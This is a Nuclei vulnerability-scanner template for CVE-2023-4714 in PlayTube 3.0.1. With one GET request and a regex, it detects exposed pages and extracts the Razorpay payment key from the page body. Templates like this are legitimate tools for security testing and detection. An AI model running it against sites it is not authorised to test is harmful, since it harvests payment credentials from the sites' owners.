nuclei-templates/http/cves/2023/CVE-2023-4714.yaml

55 lines
1.6 KiB
YAML

id: CVE-2023-4714
info:
name: PlayTube 3.0.1 - Information Disclosure
author: Farish
severity: high
description: |
A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.
impact: |
An attacker can exploit this vulnerability to gain access to sensitive information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-4714
- https://www.exploitalert.com/view-details.html?id=39826
- https://vuldb.com/?ctiid.238577
- https://vuldb.com/?id.238577
- https://github.com/Threekiii/Awesome-POC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-4714
cwe-id: CWE-200
epss-score: 0.50923
epss-percentile: 0.9748
cpe: cpe:2.3:a:playtube:playtube:3.0.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: playtube
product: playtube
tags: cve2023,cve,playtube,exposure
http:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- "razorpay_options"
- "PlayTube"
- "key:"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
regex:
- 'key: "([a-z_A-Z0-9]+)"'
# digest: 4a0a0047304502207eb10bbaaa9606985258a5fcc9285e6588b5043561e22bf71d534354f33b32d1022100f2f9202c1144fa3549e6f9370b54451d794f24d2cf391fdc9a83fbb2fb76db55:922c64590222798bb761d5b6d8e72950